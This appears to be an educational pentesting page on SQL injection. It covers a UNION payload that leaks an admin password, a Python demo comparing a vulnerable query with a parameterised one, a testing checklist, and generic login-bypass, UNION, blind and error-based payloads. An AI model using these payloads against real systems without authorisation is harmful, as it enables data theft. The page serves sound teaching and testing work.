# SQL injection overview

## What is it?

SQL injection is a vulnerability that lets an attacker alter the database queries an application makes, typically because user-supplied input is placed directly into the query text.

**A simple example**

* A vulnerable web application has the endpoint `/search?product={productName}`
* When a request is made, the application builds a SQL query around the supplied value: `SELECT * FROM products WHERE name='$productName'`
* If an attacker inserts a payload into `{productName}` such as `anything' UNION SELECT password FROM users WHERE username = 'admin`, the payload changes the structure of the query and sensitive data can be leaked.
* The vulnerable application sends the modified query to the database, and the database returns the admin's password alongside the product results.
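As an added example (not code from the original page), the search above implemented two ways in Python against a constructed in-memory SQLite database, assuming the query selects a single column so the UNION column counts line up: the string-built version returns the constructed admin password for the payload, while the parameterised version treats the same payload as nothing more than a product name that does not exist.

```python
import sqlite3

# Payload from the example above; the closing quote is supplied by the query.
PAYLOAD = "anything' UNION SELECT password FROM users WHERE username = 'admin"


def make_db():
    # Constructed in-memory database standing in for the application's backend.
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT);
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO products (name) VALUES ('widget'), ('gadget');
        INSERT INTO users VALUES ('admin', 'constructed-admin-password');
    """)
    return conn


def search_vulnerable(conn, product_name):
    # The bug: the value is pasted into the SQL text, so quotes and keywords
    # inside it become part of the query the database executes.
    sql = f"SELECT name FROM products WHERE name = '{product_name}'"
    return [row[0] for row in conn.execute(sql)]


def search_safe(conn, product_name):
    # Parameterised query: the driver passes the value separately from the
    # SQL text, so it can only ever be compared against the name column.
    sql = "SELECT name FROM products WHERE name = ?"
    return [row[0] for row in conn.execute(sql, (product_name,))]


if __name__ == "__main__":
    db = make_db()
    print(search_vulnerable(db, "widget"))   # normal lookup
    print(search_vulnerable(db, PAYLOAD))    # leaks the users.password row
    print(search_safe(db, PAYLOAD))          # no match, nothing leaked
```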

Note that the exact payload depends on the application, the structure of the query and the database engine in use. SQL injection can often lead to:

* Sensitive data exposure
* Data manipulation
* Remote code execution
* Denial of service

**Other learning resources:**

* PortSwigger: <https://portswigger.net/web-security/sql-injection>
* swisskyrepo (PayloadsAllTheThings): <https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection>

**Writeups:**

* <https://infosecwriteups.com/how-i-found-multiple-sql-injections-in-5-minutes-in-bug-bounty-40155964c498>

*Have a good writeup & want to share it here? Drop me a message on LinkedIn.*

## Checklist

* [ ] What is the technology stack you're attacking?
  * [ ] What application/framework is being used?
  * [ ] What backend DB is being used?
  * [ ] Is there an ORM?
* [ ] Verify injection points
  * [ ] URL parameters
  * [ ] Form fields
  * [ ] HTTP headers (e.g. cookies)
  * [ ] Out-of-band (e.g. data retrieved from a third party)
* [ ] Test ' and "
  * [ ] Can you trigger an error?
  * [ ] Can you trigger a different response?
* [ ] Test with sqlmap
* [ ] Test for login bypass (`' and 1=1-- -` etc.)
* [ ] Test for blind SQLi
  * [ ] Test for errors
  * [ ] Test for conditional responses
  * [ ] Test for conditional errors
  * [ ] Test for time delays
* [ ] Test for out-of-band interactions
* [ ] Test for NoSQL injection
* [ ] Is there a blocklist?
  * [ ] Can you bypass the blocklist?
    * [ ] Encoding
    * [ ] Double encoding
    * [ ] Alternative characters
    * [ ] Alternative payloads
* [ ] Test for second-order SQLi

## Exploitation

```sql
-- Basic login bypass (the trailing # is the MySQL comment marker)
' AND 1=1#
```

```sql
-- UNION SELECT (column count must match the original query)
' UNION SELECT null,null FROM users-- -
```

```sql
-- Blind: boolean condition on the first character of the version string
' AND SUBSTR((SELECT version()),1,1)='7'#
-- Error-based variant: the CAST fails and the error message echoes the value
CAST((SELECT example_column FROM example_table) AS int)
```
